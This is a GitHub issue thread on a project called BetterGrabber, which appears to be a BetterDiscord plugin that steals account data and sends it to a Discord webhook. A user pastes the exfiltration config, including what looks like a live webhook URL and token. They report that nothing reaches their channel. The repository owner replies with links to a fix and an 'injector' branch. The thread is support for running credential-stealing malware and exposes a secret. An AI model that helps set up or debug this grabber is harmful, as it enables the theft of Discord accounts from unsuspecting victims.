### ISSUE TITLE
<Error>

### ISSUE THREAD

**Issue by Raduculu** [HideakiAtsuyo/BetterGrabber#26]
**Config**
```js
  {
    pingOnResult: true,
    webHook: "https://discord.com/api/webhooks/982084333789646868/weEdjM6cqnXZTwU6DjBT-rmu6NYH_eqSfiodF _HP21n1DzPK4GLRmBktqjOFrMsD5OA",
    webhookUsername: "Spidey Bot",
    webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",

    embedTitle: "Hello World",
    embedColor: 0x36393f,

    tts: false
}
```

**
So i ve put the script with the same name in the plugins folder from betterdiscord, of course i ve edited the webhook with my discord channel webhook
and when ever i reload the discord, disable/enable the plugin it doesn t post anything in the webhook channel that i ve created
**

The problem explanation..

**Comment by HideakiAtsuyo** [comment]
> **Config**
> 
> ```js
>   {
>     pingOnResult: true,
>     webHook: "https://discord.com/api/webhooks/982084333789646868/weEdjM6cqnXZTwU6DjBT-rmu6NYH_eqSfiodF _HP21n1DzPK4GLRmBktqjOFrMsD5OA",
>     webhookUsername: "Spidey Bot",
>     webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",
> 
>     embedTitle: "Hello World",
>     embedColor: 0x36393f,
> 
>     tts: false
> }
> ```
> 
> ** So i ve put the script with the same name in the plugins folder from betterdiscord, of course i ve edited the webhook with my discord channel webhook and when ever i reload the discord, disable/enable the plugin it doesn t post anything in the webhook channel that i ve created **
> 
> The problem explanation..

https://github.com/HideakiAtsuyo/BetterGrabber#fix

https://github.com/HideakiAtsuyo/BetterGrabber/tree/injector
